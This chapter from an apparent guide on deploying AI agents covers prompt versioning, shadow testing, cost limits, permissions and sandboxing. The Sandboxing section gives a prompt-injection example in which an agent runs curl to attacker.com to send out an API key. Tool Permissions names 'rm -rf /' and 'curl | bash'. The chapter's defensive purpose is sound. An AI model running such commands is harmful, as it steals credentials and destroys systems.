Deployment Strategies

In 2023, a well-funded AI startup shipped a prompt update that seemed to improve their agent's response quality. Internal testing looked great. Metrics stayed green. Three weeks later, they noticed a 23% drop in user retention. The agent had become subtly worse at handling ambiguous queries—confident but wrong—and users had quietly left.

Deploying an AI agent isn't like deploying a web API. With a traditional API, you ship code, run tests, monitor error rates. If errors spike, you roll back. The feedback loop is tight and deterministic—same input, same output, measurable correctness.

Agents break these assumptions. The same prompt can produce different outputs. "Better" is subjective and hard to measure automatically. A prompt change that improves one conversation might degrade another. And unlike a bug that crashes loudly, a subtly worse prompt just... works less well. Users might not even notice immediately. You will—when retention drops.

This chapter covers the patterns that account for these realities, organized into three parts: how to ship changes safely, how to protect production systems at runtime, and how to handle operational lifecycle events.


Part 1: Shipping Changes Safely

Prompt Versioning

A team ships a prompt update on Friday. They've tested it manually—responses look good. Error rates stay flat over the weekend. Monday morning, the support queue has tripled. Users complain the assistant is "less helpful" and "misses the point."

The team checks logs. No errors. Latency is normal. Token counts are similar. They diff the prompt and find a single sentence was reworded to be "clearer." That clarity, it turns out, made the model less likely to ask clarifying questions—so it started confidently answering the wrong interpretation of ambiguous queries.

This is the core challenge: prompts don't compile. A syntax error in code fails loudly at build time. A poorly worded prompt fails silently at runtime. It produces outputs that are technically valid but subtly wrong. Your monitoring won't catch it. Your tests won't catch it. Only your users will—eventually.

Treat prompts with the same rigor as application code:

agent/
├── prompts/
│   ├── v1.0.0/
│   │   ├── system.md
│   │   └── tools.json
│   ├── v1.1.0/
│   │   ├── system.md
│   │   └── tools.json
│   └── current → v1.1.0/
├── config.yaml          # model, temperature, limits
└── evals/
    └── baseline.json    # expected behaviors to test against

Version numbers follow semantic conventions: patch for typo fixes, minor for new capabilities, major for fundamental behavior changes. But the version number is just bookkeeping. The real protection comes from evaluation—running the new prompt against a suite of test cases and comparing outputs to the previous version. If scores drop, you investigate before shipping. See Observability & Evaluation for how to build these pipelines.

Gradual Rollouts

Standard canary deployment says: route 1% of traffic to the new version, watch error rates, expand gradually. For a checkout API, this works beautifully. Errors are errors. Success is success. The metrics don't lie.

Try this with an agent. You deploy prompt v2 to 5% of users. Error rate: unchanged. Latency: slightly better. Token usage: about the same. Green across the board. You expand to 50%, then 100%.

Two weeks later, someone notices that conversion on a key workflow dropped 12%. They dig into session recordings and find that v2 gives confident but shallow answers, while v1 asked follow-up questions that led users to better outcomes. The "improvement" in latency came from the model doing less work—and providing less value.

The problem: you can't A/B test agents like you A/B test button colors. There's no clean metric for "response quality." Error rates miss the subtle failures. User ratings are sparse and lagging. You need a different approach.

Shadow Deployments

The safest pattern: run both versions on every request, serve only one, compare offline.

Shadow mode doubles your inference costs, but it gives you paired comparisons without risking user experience. Run it for a few days on a sample of traffic, collect hundreds of v1/v2 pairs, then evaluate.
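One way to wire this up, sketched below with a hypothetical call_agent(version, input) function and a log sink: serve v1 to the user, and on a sample of traffic also run v2 and record the pair. In production the shadow call would run asynchronously so it never adds latency.

```python
import random

def handle_request(user_input: str, call_agent, log, shadow_rate: float = 0.10):
    """Serve v1; on a sample of traffic, also run v2 and log the pair offline."""
    served = call_agent("v1", user_input)  # the user only ever sees v1's answer
    if random.random() < shadow_rate:
        try:
            candidate = call_agent("v2", user_input)  # run async in production
            log({"input": user_input, "v1": served, "v2": candidate})
        except Exception:
            pass  # a shadow failure must never affect the live response
    return served
```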

Evaluation can be automated with an LLM-as-judge: feed it both outputs (randomized to avoid position bias) and ask which better addresses the user's request. The judge has its own biases, so calibrate it against human preferences and sample manually to catch systematic blind spots. See Observability & Evaluation for implementation details.
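A position-randomizing wrapper around the judge call might look like the following sketch, where ask_judge stands in for the LLM call and is assumed to answer "1" or "2":

```python
import random

def judge_pair(user_input: str, out_a: str, out_b: str, ask_judge) -> str:
    """Compare two outputs in randomized order to avoid position bias.

    `ask_judge(prompt)` is a stand-in for an LLM call returning "1" or "2".
    Returns "a" or "b", mapped back to the original versions.
    """
    first, second, flipped = out_a, out_b, False
    if random.random() < 0.5:
        first, second, flipped = out_b, out_a, True
    prompt = (
        f"User request:\n{user_input}\n\n"
        f"Response 1:\n{first}\n\nResponse 2:\n{second}\n\n"
        "Which response better addresses the request? Answer 1 or 2."
    )
    picked_first = ask_judge(prompt).strip().startswith("1")
    if flipped:
        return "b" if picked_first else "a"
    return "a" if picked_first else "b"
```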

After a shadow deployment, you'll have data: "v2 preferred 62% of the time, with regressions concentrated in technical queries." Now you can make an informed decision—iterate on the prompt to fix the regressions, or ship with known limitations.

Feature Flags

For simpler rollouts, feature flags let you control exposure without deploying new code:

  • Percentage rollouts: 5% of users get v2, scaling up as confidence grows
  • Segment targeting: Enterprise users stay on stable v1 while early adopters test v2
  • Kill switches: Instantly disable a problematic feature without a full rollback

Feature flags work well when you have clear success metrics or when the change is low-risk. For high-stakes prompt changes where quality is hard to measure, combine flags with shadow evaluation.
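Percentage rollouts need stable bucketing: a user should land in the same variant on every request, and expanding from 5% to 50% should only add users, never reshuffle them. A hash-based sketch (flag name and function are illustrative):

```python
import hashlib

def variant_for(user_id: str, rollout_pct: int, flag: str = "prompt-v2") -> str:
    """Stable percentage rollout: the same user always lands in the same bucket."""
    digest = hashlib.sha256(f"{flag}:{user_id}".encode()).hexdigest()
    bucket = int(digest, 16) % 100  # 0-99, roughly uniform across users
    return "v2" if bucket < rollout_pct else "v1"
```

Seeding the hash with the flag name means different flags bucket users independently, so one experiment doesn't correlate with another.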

Rollback Strategies

Things will go wrong. A prompt that tested well might fail on edge cases you didn't anticipate. A model update might interact badly with your system prompt. When this happens, you need to recover quickly.

The challenge with agent rollbacks is that they're not purely technical. An agent might have:

  • Created state (database records, sent messages, made API calls)
  • Built context with users mid-conversation
  • Made promises it can't keep after rollback

Fast Detection

You can't roll back what you don't detect. Standard metrics (latency, error rates) miss most agent regressions. Build detection around:

  • Evaluation samples: Run a small eval suite continuously against production traffic. If scores drop, alert.
  • User signals: Thumbs down, conversation abandonment, repeated rephrasing of the same question.
  • Anomaly detection: Sudden changes in token usage, tool call patterns, or response length often indicate something changed.

Rollback Mechanics

Keep rollback simple—complexity in an emergency leads to mistakes.

If using feature flags: Disable the flag. Traffic immediately routes to the old version. This is the fastest option—seconds, not minutes.

If using versioned prompts: Update the current symlink to point to the previous version. This requires a config reload but no code deploy.
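On POSIX systems the symlink flip can be made atomic by creating the new link under a temporary name and renaming it over current, so a concurrent reader never sees a missing link. A sketch:

```python
import os
from pathlib import Path

def rollback_prompt(prompts_dir: Path, target_version: str) -> None:
    """Atomically repoint prompts/current at an older version."""
    tmp = prompts_dir / ".current.tmp"
    if tmp.is_symlink() or tmp.exists():
        tmp.unlink()
    os.symlink(prompts_dir / target_version, tmp)
    os.replace(tmp, prompts_dir / "current")  # atomic rename on POSIX
```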

If state was affected: This is harder. You may need to:

  • Identify sessions that interacted with the bad version
  • Decide whether to continue those sessions on the old version or migrate them
  • In extreme cases, manually remediate data created by the bad version

The key principle: design for rollback before you need it. If rolling back requires a deploy, you're too slow. If rolling back breaks active sessions, you haven't thought through state transitions.


Part 2: Runtime Safeguards

Shipping changes safely is half the battle. The other half is protecting production systems from the inherent unpredictability of agents—their costs, their capabilities, and their potential to do damage.

Cost Guardrails

In March 2024, a developer posted on Reddit about an agent that ran up a $2,400 bill overnight. The agent had a tool that queried an external API, and the API started returning errors. The agent, trying to be helpful, retried. And retried. And retried—each retry consuming tokens for the error message, the agent's "reasoning" about the error, and the next attempt. By morning, it had made 47,000 API calls and burned through a month of budget.

Traditional APIs have predictable costs. Agent costs are unbounded. A single request can spawn dozens of tool calls. A loop bug can run until your credit card declines.

Production agents need multiple layers of protection:

Request budgets cap tokens per request. If an agent gets stuck or generates excessive output, cut it off and return a graceful message rather than an error. Most legitimate requests complete well under 10k tokens; a 50k token request usually indicates that something is wrong.

Loop limits count agentic turns—each cycle of LLM → tool → LLM. An agent that exceeds 15-20 turns without meaningful progress should be forced to summarize and conclude. This catches the retry spirals and circular reasoning patterns that burn money without value.

Session budgets cap total spend across a conversation. Users can run many requests, and bugs often manifest over time. A per-session limit (say, $5) prevents runaway costs while still allowing substantial conversations.

The other half of cost control is attribution: knowing where money goes. Track spend by model, tool, user segment, and prompt version. When costs spike 40%, you need to know whether it's the new prompt, a specific tool, or a handful of power users. Attribution turns a billing surprise into an actionable investigation.
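A minimal attribution layer just tags every spend event with the dimensions you will want to slice by later. A sketch; in production these totals would flow into your metrics system rather than an in-process dict:

```python
from collections import defaultdict

class CostTracker:
    """Attribute spend along the dimensions you'll need when costs spike."""

    def __init__(self):
        self.totals = defaultdict(float)  # (dimension, value) -> dollars

    def record(self, cost_usd: float, **labels):
        # e.g. record(0.012, model="gpt-4o", tool="search", prompt="v1.1.0")
        for dim, value in labels.items():
            self.totals[(dim, value)] += cost_usd

    def by(self, dim: str) -> dict:
        """Total spend broken down by one dimension."""
        return {v: c for (d, v), c in self.totals.items() if d == dim}
```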

Permissions

Cost guardrails protect your wallet. Permission controls protect your systems.

A startup built a customer support agent with database access. The agent could look up orders, check shipping status, process refunds—everything a human support rep could do. They gave it a database user with broad read/write access because "it needs to help customers."

One day, a user asked the agent to "show me all orders from last month." The agent, trying to be helpful, ran a query that scanned millions of rows. The database locked up. Production went down for 20 minutes.

The query wasn't malicious. The agent wasn't hacked. It just did what it was asked with the permissions it had. The team had given it the power of a database administrator when it only needed the power of a support rep.

Database Permissions

The principle of least privilege applies doubly to agents because they're unpredictable. A human support rep knows not to run SELECT * on a 50-million-row table. An agent might try it to "be thorough."

Create dedicated database credentials for your agent with minimal scope:

  • Read-only views instead of direct table access. The view can filter to relevant columns and enforce row limits.
  • Row-level security when possible. The agent should only see data relevant to the current user's request.
  • Query timeouts at the database level. If a query runs longer than 5 seconds, kill it.
  • No DDL access. The agent should never be able to DROP TABLE or modify schema.

If your agent needs write access—say, to update order status—use a narrow API rather than raw SQL. An update_order_status(order_id, status) function is safer than UPDATE permission on the orders table.
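Such a narrow write path can be a plain function that validates input and runs one parameterized statement, backed by a database user whose only write grant is that single column. A sketch using sqlite-style ? placeholders (your driver's placeholder syntax may differ):

```python
ALLOWED_STATUSES = {"pending", "shipped", "delivered", "refunded"}

def update_order_status(conn, order_id: int, status: str) -> bool:
    """Narrow write path: the agent can set a status, nothing else."""
    if status not in ALLOWED_STATUSES:
        raise ValueError(f"status must be one of {sorted(ALLOWED_STATUSES)}")
    cur = conn.execute(
        "UPDATE orders SET status = ? WHERE id = ?", (status, order_id)
    )
    conn.commit()
    return cur.rowcount == 1  # False if the order doesn't exist
```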

Tool Permissions

Beyond databases, consider every tool your agent can invoke. A shell command tool is the most dangerous—an agent that can run rm -rf / or curl | bash has the keys to your kingdom.

For server-side agents:

  • Allowlist commands rather than blocklist. Don't try to enumerate dangerous commands; enumerate the safe ones.
  • No network access by default. If a tool needs to call an external API, proxy it through your backend where you can enforce rate limits and audit.
  • Separate credentials per tool. Your Slack-posting tool shouldn't have AWS credentials.

For client-side agents (running on user devices, browser extensions, desktop apps):

  • Explicit user consent for sensitive operations. File system access, clipboard, camera—these should prompt, not happen silently.
  • Sandboxed execution even when the user consents. A bug shouldn't compromise the entire device.
  • No credential access. The agent should never touch browser cookies, SSH keys, or password managers.

The pattern across all of this: give the agent the minimum capability it needs, assume it will try things you didn't anticipate, and contain the blast radius when it does.

Sandboxing

Permissions control what an agent is allowed to do. Sandboxing isolates what it actually does—so that even if permissions fail or the agent finds an unexpected path, the damage is contained.

This matters most for code execution. An agent that can write and run code can, in theory, do anything—which is exactly the problem.

Consider what happens without sandboxing: the agent runs in your backend process, with your environment variables, your network access, your file system. A prompt injection convinces it to run import os; os.system('curl attacker.com/steal?token=' + os.environ['API_KEY']). Your secrets are gone.

Even without malicious input, agents make mistakes. They might write an infinite loop, fill up disk with log files, or spawn processes that consume all available memory. On a shared server, one misbehaving agent can take down everything.

Sandboxing isolates agent-generated code from your infrastructure. The question is: how much isolation do you need?

Container vs MicroVM

Docker containers are the default isolation choice for most applications. They're fast to build, widely supported, and good enough for many use cases. But for agent code execution, containers have limitations.

Containers share the host kernel. A kernel vulnerability—or a container escape exploit—can break isolation entirely. For trusted code this is acceptable risk. For arbitrary code from an unpredictable agent? Less so.

Container startup also takes seconds. For interactive agents where users expect near-instant responses, a 2-3 second cold start is noticeable.

MicroVMs (like Firecracker, the technology behind AWS Lambda and Fargate) offer stronger isolation with surprising speed. Each execution runs in a lightweight virtual machine with its own kernel. The isolation is at the hardware virtualization level, not just process namespaces.

Aspect              Docker Container            MicroVM (Firecracker)
Isolation           Process/namespace           Hardware virtualization
Kernel              Shared with host            Dedicated per VM
Boot time           1-3 seconds                 ~125 milliseconds
Memory overhead     Low (~10MB)                 Low (~5MB)
Security boundary   Container escape possible   VM escape much harder

The boot time difference matters for agents. A 125ms cold start is imperceptible in a conversation. A 3-second wait breaks flow.

Sandbox Platforms

Rather than building sandbox infrastructure yourself, several platforms specialize in agent code execution:

E2B is built specifically for AI agents. It uses Firecracker microVMs, boots in milliseconds, and provides SDKs for Python and JavaScript. You get a sandboxed environment with filesystem, network (controllable), and process isolation. The agent can install packages, write files, run long-lived processes—all isolated from your infrastructure.

Modal offers serverless containers with fast cold starts and GPU support. Good for agents that need to run ML models or heavy computation alongside code execution.

Fly Machines provides fast-booting VMs that can be started and stopped programmatically. It's more general-purpose than E2B, but flexible enough to build agent sandboxes on.

CodeSandbox focuses on web development environments. Useful if your agent works with frontend code and users need to see live previews.

For most production agent deployments, a dedicated sandbox platform is worth the cost. Building your own isolation layer is complex, and the security stakes are high.

Production Considerations

Sandboxing introduces operational complexity. A few things to plan for:

Cold starts vs warm pools. MicroVMs boot fast, but even 125ms adds up if every tool call requires a new VM. Keep a pool of warm sandboxes ready for instant use, and size the pool based on traffic patterns.

Networking controls. Should the sandbox have internet access? If yes, the agent can fetch dependencies and call APIs—but also exfiltrate data. Many teams disable outbound network by default and allowlist specific domains.

Secrets injection. The agent might need API keys to call external services. Inject them at runtime through environment variables, scoped to that sandbox session. Never bake secrets into the sandbox image.

Resource limits. Set CPU, memory, and disk quotas per sandbox. An infinite loop should hit a timeout, not consume unlimited resources.

Persistence. By default, sandboxes should be ephemeral—destroyed after each session. If you need state across sessions (installed packages, generated files), explicitly persist it to external storage and restore on next boot.

The goal is defense in depth: even if the agent generates malicious or buggy code, the blast radius is contained to a disposable sandbox that can't touch your real infrastructure.
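To make these controls concrete, here is a deliberately minimal local sketch: resource limits, a scratch directory, a stripped environment, and a wall-clock timeout around agent-generated Python. This is for illustration only and is not a security boundary; production systems should use the container or microVM platforms discussed above.

```python
import resource
import subprocess
import sys
import tempfile

def run_untrusted(code: str, timeout_s: int = 5, mem_mb: int = 512) -> str:
    """Run agent-generated Python with CPU/memory caps and a throwaway workdir."""
    def limits():  # applied in the child process just before exec (POSIX only)
        resource.setrlimit(resource.RLIMIT_CPU, (timeout_s, timeout_s))
        mem = mem_mb * 1024 * 1024
        resource.setrlimit(resource.RLIMIT_AS, (mem, mem))

    with tempfile.TemporaryDirectory() as scratch:
        proc = subprocess.run(
            [sys.executable, "-I", "-c", code],  # -I: isolated mode, no user site
            cwd=scratch,                          # writes land in a throwaway dir
            env={"PATH": "/usr/bin:/bin"},        # no inherited secrets in env
            capture_output=True, text=True,
            timeout=timeout_s + 1,                # wall-clock backstop
            preexec_fn=limits,
        )
    return proc.stdout if proc.returncode == 0 else f"error: {proc.stderr.strip()}"
```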


Part 3: Operational Lifecycle

Beyond shipping and runtime protection, production agents face ongoing operational challenges: external dependencies change, and stateful systems need careful handling.

Model Migration

On June 6, 2024, OpenAI announced that gpt-4-32k would be deprecated. Teams that had prompts tuned for that model had until the deadline to migrate. Some started immediately and found their prompts worked fine on the successor. Others waited, discovered issues a week before cutoff, and shipped degraded experiences while scrambling to adapt.

Model deprecation is inevitable—every provider retires models eventually. The challenge is that prompts and models are coupled more tightly than most teams realize. A prompt optimized for GPT-4 might perform differently on Claude. A system prompt that constrained one model might not constrain another. Even within the same model family, behavior can shift between versions.

The migration workflow should start the moment deprecation is announced:

Run your evaluation suite against the new model immediately. If scores are similar, proceed to shadow deployment. If you see regressions, you have time to adjust the prompt—maybe the new model needs more explicit constraints, or maybe it performs better with fewer instructions. Some changes are mechanical (different tool-calling conventions), others are subtle and require experimentation.

Keep the old prompt version even after migration. If the new model has issues you didn't catch in testing, you might be able to revert to the old model temporarily while you fix the prompt—assuming the old model is still available.

State Management

Agents often maintain conversation history and session state, which adds complexity that stateless APIs don't have.

Storage choices depend on your requirements. Redis gives you speed—sub-millisecond reads for conversation history. PostgreSQL gives you durability and queryability—useful for analytics and debugging. Managed services like DynamoDB scale automatically but lock you into a provider. The one rule: never store conversation history in application memory. You'll lose it on deploy.

Version transitions require thought. When you ship a new agent version, users mid-conversation face a transition:

  • Soft boundary (simplest): Complete the current request on v1, start the next on v2. The new agent inherits conversation history and continues. Works for backward-compatible changes.
  • Session pinning: Route sessions to the version they started on until they naturally end. Safer for major changes but means running multiple versions longer.
  • Forced migration: Cut over immediately. Risky if the new version interprets old context differently.
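Session pinning reduces to a small routing function in front of the agent: look up the session's pinned version, or pin new sessions to the latest. A sketch where store is any dict-like persistent store (a Redis hash, a DB table):

```python
def route_version(session_id: str, store, latest: str = "v2") -> str:
    """Pin each session to the agent version it started on."""
    pinned = store.get(session_id)
    if pinned is None:
        store[session_id] = latest  # new session: pin it to the latest version
        return latest
    return pinned  # existing session: keep whatever it started on
```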

Schema evolution matters if your state format changes. Adding a field is easy—old sessions just won't have it. Removing or renaming fields requires migration. Version your state schema alongside your prompts, and write migration logic for breaking changes.

Retention and cleanup: Conversation history grows. Decide how long to keep it (regulatory requirements, debugging needs, storage costs) and automate cleanup. Consider summarizing old conversations rather than deleting them entirely—summaries preserve context for analytics while reducing storage.


Putting It Together

Deploying agents requires thinking differently than deploying traditional software. The non-determinism means you can't rely on standard metrics. The unbounded costs mean you need guardrails at multiple layers. The powerful capabilities mean you need defense in depth.

The patterns in this chapter—versioning, shadow deployments, cost budgets, permission scoping, sandboxing, and migration workflows—aren't optional hardening for later. They're the foundation that lets you ship with confidence.

Start with the basics: version your prompts, set cost limits, and never give an agent more permissions than it needs. Add sophistication (shadow deployments, evaluation pipelines, sandbox infrastructure) as your system matures and the stakes increase.


Next: Real-Time Multimodal Agents